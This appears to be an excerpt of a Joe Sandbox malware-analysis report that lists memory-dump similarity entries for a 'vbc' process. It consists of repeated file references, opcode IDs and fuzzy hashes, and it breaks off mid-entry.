                                                                                                                        • Critical error detected %lx, xrefs: 053E7027
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Critical error detected %lx
                                                                                                                        • API String ID: 0-802127002
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 15ea89416decd449cbc7f2919ce43bbf8c7038f855a687997a76c1552244eafa
                                                                                                                        • Instruction ID: 59300255d18dedbeb214e3e112197068c112acdc8738bdd86312b239280a21df
                                                                                                                        • Opcode Fuzzy Hash: 15ea89416decd449cbc7f2919ce43bbf8c7038f855a687997a76c1552244eafa
                                                                                                                        • Instruction Fuzzy Hash: 60424975A002199FDB25CF69C881BADFBF6BF48310F14809DE949AB241DB74AE81CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0cdcdb453c43de235d93e8bb972b597ae6301696a74007bc115f52dd6d5b2ae4
                                                                                                                        • Instruction ID: db3de11454b5ed348966f4f0904edac35d44ed6d98f502734baa25390c821678
                                                                                                                        • Opcode Fuzzy Hash: 0cdcdb453c43de235d93e8bb972b597ae6301696a74007bc115f52dd6d5b2ae4
                                                                                                                        • Instruction Fuzzy Hash: C122DE722086518BDB25CF29E294772F7F2BF44300F08845AE8978FA85D7B5E592CB70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 63e46f8f421e0fc1e88e33df71baf68327207b4a3f2334d825c7577a24c3b7a2
                                                                                                                        • Instruction ID: 82f1bc04f95e903d2de882776b7df8cb0f76507027fb3922bedb567b086b2956
                                                                                                                        • Opcode Fuzzy Hash: 63e46f8f421e0fc1e88e33df71baf68327207b4a3f2334d825c7577a24c3b7a2
                                                                                                                        • Instruction Fuzzy Hash: C7225FB1E0411ADBCF19CF95C481ABEFBF6BF48314B24846AE845AB241E774DD91CB60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 94991c3eac156a8075fbcab22af53c7756b8e0ca44b1dff926b700b5b173d28b
                                                                                                                        • Instruction ID: ad66122ab40f5a6965cc16e1a0878685742ec12918da8e884380d0213fa4e909
                                                                                                                        • Opcode Fuzzy Hash: 94991c3eac156a8075fbcab22af53c7756b8e0ca44b1dff926b700b5b173d28b
                                                                                                                        • Instruction Fuzzy Hash: 4FE1B171608341DFC714CF28C092A6ABBE1FF89304F458A6DF8959B351DB71E905CB92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bbb522e3637da79de462f126b1ac297b4278222d3d4833141a20dce91608ea45
                                                                                                                        • Instruction ID: 5edfbfdb215cad8359ccbfb7a328d53daa830b76f48cfcbfd4aa7cf0ff13881c
                                                                                                                        • Opcode Fuzzy Hash: bbb522e3637da79de462f126b1ac297b4278222d3d4833141a20dce91608ea45
                                                                                                                        • Instruction Fuzzy Hash: 9AD1F471B00B26DBCB18DF68C890FBAF3A6BF44304F144629E956DB680E774E945CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 41d231a67cff45e6fbc5c52bf001e4369546e146738928e74ccfa52fc06a983b
                                                                                                                        • Instruction ID: ab38974c85dc19d1a9fc90f5e90a386562f585e77ca09572385558e1f2763e56
                                                                                                                        • Opcode Fuzzy Hash: 41d231a67cff45e6fbc5c52bf001e4369546e146738928e74ccfa52fc06a983b
                                                                                                                        • Instruction Fuzzy Hash: 08E11870E042599BCF14CFA8C981ABEBBF6FF49244F14819EE845AB241E375DD45CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e93c0c45a03da8942742ec3407bc4ff6bf38432546224364b1f966b4dd35be73
                                                                                                                        • Instruction ID: f0e61647209711f93e9374d662a5490d609f395ecee70c796644f6a9a1e1cec1
                                                                                                                        • Opcode Fuzzy Hash: e93c0c45a03da8942742ec3407bc4ff6bf38432546224364b1f966b4dd35be73
                                                                                                                        • Instruction Fuzzy Hash: ABE124B4D00608DFCF25CFA9C984AADBBF6FF48324F14556AE946A7660DB70A941CF10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4ed8cf8bfc81e5de5fc0893b9f22964373f88d17a2b3c9a7f3f775396a6404b3
                                                                                                                        • Instruction ID: 0e6e93b5915d62e70bdf2971525d619719984bf5ab4b58b95958ddd976edab7e
                                                                                                                        • Opcode Fuzzy Hash: 4ed8cf8bfc81e5de5fc0893b9f22964373f88d17a2b3c9a7f3f775396a6404b3
                                                                                                                        • Instruction Fuzzy Hash: 3CD1D430B043298FEB75CB55C894BAAB7F6BB45300F4448E9D90AAB241DBB4BD85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                        • Instruction ID: 7add00917385840b8a108e16bad05d0f8dc40ed169527ca9120e66a7b424e8ac
                                                                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                        • Instruction Fuzzy Hash: C3B14F74B00604AFEF24DB95C944EEBF7BEBF84304F14446DAA429BB94DAB4E945CB10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                        • Instruction ID: 7d0d29adad233f109b705e98c044994148dafa3ed217c127a832a1f9b773a0a8
                                                                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                        • Instruction Fuzzy Hash: B9B1F171708645AFDF29DBA8C848BBEBBFAFF44200F140599D6529B281DB70E941CF90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 47dbf6b8a8eedf23e7c07262d17334ec7c908fcab1fb71ec159192e1ce5f8f81
                                                                                                                        • Instruction ID: defc9c5aabfb2b0ea0ada704c17e9c7a3b3f2fe4a8d3f2e81a37772b48d7c4fd
                                                                                                                        • Opcode Fuzzy Hash: 47dbf6b8a8eedf23e7c07262d17334ec7c908fcab1fb71ec159192e1ce5f8f81
                                                                                                                        • Instruction Fuzzy Hash: 00C16D70E04259DFDB28DF99C888EAEFBBAFF44314F205129E805AB645DB71A941CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: be670af6ec6757a3d9a1fe92a3c9f939c89c65fff540c83b1627c7dc31d0f46e
                                                                                                                        • Instruction ID: db4868615c0aa82429bd0b2acef820a1699c13bf8b6048949981ecdbda3c76ab
                                                                                                                        • Opcode Fuzzy Hash: be670af6ec6757a3d9a1fe92a3c9f939c89c65fff540c83b1627c7dc31d0f46e
                                                                                                                        • Instruction Fuzzy Hash: 1FC16970608341CFEB64CF19C495BABB7E5BF88304F44496DE98A97290D7B4E908CF92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 61872a0e6b8fa2758795545aec6fce8e022f73f6b8f9e790c5d4c5f014202208
                                                                                                                        • Instruction ID: 6741b085f8b516629435cdad8e11aa4407c399a83fed671cbbf36d0c509b380f
                                                                                                                        • Opcode Fuzzy Hash: 61872a0e6b8fa2758795545aec6fce8e022f73f6b8f9e790c5d4c5f014202208
                                                                                                                        • Instruction Fuzzy Hash: EBB17E70B046699BDB64DF55C894BBDB3B6BF44710F1485EAD40AE7280EB70DD86CB20
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 99c675d11200dbf8ed31af291ed89c591bf2d5c6bff397a91dc46bee24512e99
                                                                                                                        • Instruction ID: 3f1147b57fc116ad656395fd0ae5292fc97d19c997532623904d37681553eba5
                                                                                                                        • Opcode Fuzzy Hash: 99c675d11200dbf8ed31af291ed89c591bf2d5c6bff397a91dc46bee24512e99
                                                                                                                        • Instruction Fuzzy Hash: 3FA13771E046189FDF26DB68C848FAEBBAABF04760F054155ED11EB280D7B4AE40CBD1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a917f96fde39e583f230d72660169b476b5508a31456207d5eab0955b95b4f4c
                                                                                                                        • Instruction ID: 9b6f3a2954c8271d3e498c7dd67cba5704cb97b2e315287d0a386bbf22cd07f7
                                                                                                                        • Opcode Fuzzy Hash: a917f96fde39e583f230d72660169b476b5508a31456207d5eab0955b95b4f4c
                                                                                                                        • Instruction Fuzzy Hash: 1EA1AF72B0061A9BDB38DF65C999BBAB7F6FF44314F004029EA45E7291DB78A811CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        • Instruction Fuzzy Hash: EF518FB2E0460ADFCF18CF98C980AEDB7BAFB48215F149179D856A7200D674AE41DF94
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4a8e1cc31b2c0ecf60f0130b24126ed6c44c41a4aff8c02c308e036b63e13bd5
                                                                                                                        • Instruction ID: b71beb81b31996fdce720f575cc2b842de7b9f845dbceadd9f989dd6ee9be6d1
                                                                                                                        • Opcode Fuzzy Hash: 4a8e1cc31b2c0ecf60f0130b24126ed6c44c41a4aff8c02c308e036b63e13bd5
                                                                                                                        • Instruction Fuzzy Hash: C851D372608702AFD715DF28C844BAAB7E6FF84350F04492CFA9597290D774E908CB95
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 790b41bfe38895c0245ffffff610d7444011a75ee9732d04ac0191e5b2d216e6
                                                                                                                        • Instruction ID: 8c373239ddd6bdf4cdc51adb6dfb58fc1e31b1c9f9e22f12e83f7771fae81ae3
                                                                                                                        • Opcode Fuzzy Hash: 790b41bfe38895c0245ffffff610d7444011a75ee9732d04ac0191e5b2d216e6
                                                                                                                        • Instruction Fuzzy Hash: CE51BE71A00704DFD720DF96D884AABFBF9BF44714F10461EE196976A0C7B0B945CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 90a6f0bcfedd8f7a98268deeb4861ebb15f46cf3956788ce9649d9435e2b307f
                                                                                                                        • Instruction ID: e83438e439a9122d6e3fa42dcb25c551046631d66bcb09bd6ecf2c2bf7e6fde7
                                                                                                                        • Opcode Fuzzy Hash: 90a6f0bcfedd8f7a98268deeb4861ebb15f46cf3956788ce9649d9435e2b307f
                                                                                                                        • Instruction Fuzzy Hash: 53515976200A14DFCB22EFA4C984FAAB3FEFF04640F50482AE54297660D774ED54DB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                                                                        • Instruction ID: b23fe3571083fcba29e301355c812eace636c1713a0d5850b980b89a87757a81
                                                                                                                        • Opcode Fuzzy Hash: 0dd880a76b3c9ad43efb921dc5a3afa35dc6003f9888093ab0210770e1e55351
                                                                                                                        • Instruction Fuzzy Hash: BC51DF72B11640EBDB26EF58CD94F3A777AFF45A61F154168F8028B650C674DC01EBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                        • Instruction ID: e4362f81f84bd8eb614f9464b7d9763e4a0c63b7b33e1b4d71d608545a4831aa
                                                                                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                        • Instruction Fuzzy Hash: A6519071E04219ABCF19DFA4C854FEEBBB9AF45360F044069E911EB240D774ED84CBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 951c012d8215c6456405959d47bc74a48152e162f20f97a15513b3786a77c868
                                                                                                                        • Instruction ID: 634ed2dd9b774ea9535e972d03ae9f24a778b1ed75351a61d9510b2fd98c6fed
                                                                                                                        • Opcode Fuzzy Hash: 951c012d8215c6456405959d47bc74a48152e162f20f97a15513b3786a77c868
                                                                                                                        • Instruction Fuzzy Hash: C05145726083459FCB54DF69E881A6BB7F5BBC8204F44492DF889C7250EBB0D915CB62
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5e434396ce7175d4155841097d1f0350428f0b02adca3a4daaf692ca26ec36fa
                                                                                                                        • Instruction ID: 437fcc6b2bf2b7b08ecafe49b762e0e06de95ba90021ad50d4f722206abd8d7a
                                                                                                                        • Opcode Fuzzy Hash: 5e434396ce7175d4155841097d1f0350428f0b02adca3a4daaf692ca26ec36fa
                                                                                                                        • Instruction Fuzzy Hash: 2451AD717087519FC304EF29D885A6BB7E9FF88614F04892DF899C7281DB30E905CBA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6fcf909129064614c11a96283c40a72df333bd5f8b58e7d9ffdeda357f98cab8
                                                                                                                        • Instruction ID: 902e0217dfa1fa68e5c7eeef7499afdf84c7e4378ba991aefb6e88bc1886cbba
                                                                                                                        • Opcode Fuzzy Hash: 6fcf909129064614c11a96283c40a72df333bd5f8b58e7d9ffdeda357f98cab8
                                                                                                                        • Instruction Fuzzy Hash: 7D51DD7160420ECBDB25DE24C568B35B7AAFB81255F14E52DE887CB158DA71CC83C761
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0184a2abf88b90330d8ef66fd383c7e38d0202d4244e911cdb03e760e9b0eab9
                                                                                                                        • Instruction ID: 0963074824601e73450054f04a218124fcec1f04e0068a8df01336fa22f1dbb7
                                                                                                                        • Opcode Fuzzy Hash: 0184a2abf88b90330d8ef66fd383c7e38d0202d4244e911cdb03e760e9b0eab9
                                                                                                                        • Instruction Fuzzy Hash: 78412A32B50210DBCB2DEF649886FBA7B66FB45304F41542DFE42AB250DBB1D890CB61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eb2a2fa16a878adb6ac617dda949da067b3ce0cea451a201ce2e761aaa2bcae8
                                                                                                                        • Instruction ID: a5d7b25005ca3b92303bf313bf89de1adbffeed28b284dfae1061df972949ee1
                                                                                                                        • Opcode Fuzzy Hash: eb2a2fa16a878adb6ac617dda949da067b3ce0cea451a201ce2e761aaa2bcae8
                                                                                                                        • Instruction Fuzzy Hash: 7241CE36A00218DBCB18DFA8C449AEEB7B5FF48710F24816EE816F7244D775AC41CBA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                        • Instruction ID: 40bca871c0a858b3074844615ce5f294881fd3749a9f44566b88d8ad11b28cd3
                                                                                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                        • Instruction Fuzzy Hash: 02514C76A00615DFCB14CF98C580AAEF7B6FF84710F2481A9D815A7790D774AE41CB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e45383af500744a6c964c94e2ac6dfd2e8b5b56f481af3bc7d727a39f90e8527
                                                                                                                        • Instruction ID: 746cf04060d3f29e4f29084f845e65831015079605513241f5f9287264d2c19b
                                                                                                                        • Opcode Fuzzy Hash: e45383af500744a6c964c94e2ac6dfd2e8b5b56f481af3bc7d727a39f90e8527
                                                                                                                        • Instruction Fuzzy Hash: 1D51F570A04516AFDB29DB24CC0ABF9BBB6FF01314F1582A5E425A76D0DB749981CF80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cc16d25eda6ad60c9abd661c12b162b9a99d779108e4a0668dc03aebb55d3d65
                                                                                                                        • Instruction ID: 3895195731dc960ef1d3f1d8db6b1255a7bf61856bb0227216a0d53f883919ec
                                                                                                                        • Opcode Fuzzy Hash: cc16d25eda6ad60c9abd661c12b162b9a99d779108e4a0668dc03aebb55d3d65
                                                                                                                        • Instruction Fuzzy Hash: 0A41B375B007189FEB39DF64CC8AFAAB7AABB45610F00049AE8459B281D7B4ED44CB51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                        • Instruction ID: 40d7c2978f251b500d54151a77067c66fa79afd673a4d3f1052558c209a27ae1
                                                                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                        • Instruction Fuzzy Hash: A841B276B04205ABDB19DF99CC85ABFFBBABF88600F144069EA01E7351DA70DD0587A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 01da1c4149f63ff79d31563458b510f012b690f9c365a7ca74cc6c6105f01dce
                                                                                                                        • Instruction ID: 794515ebe56fbd2b371bdd54e8a4a2bc7cf4ef5d432307af5bc9c1e6155adcef
                                                                                                                        • Opcode Fuzzy Hash: 01da1c4149f63ff79d31563458b510f012b690f9c365a7ca74cc6c6105f01dce
                                                                                                                        • Instruction Fuzzy Hash: 68315075A011699BDB24DF19CC58FAFB7B9FB44650F0500AAEC09E7250DB349E81CFA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
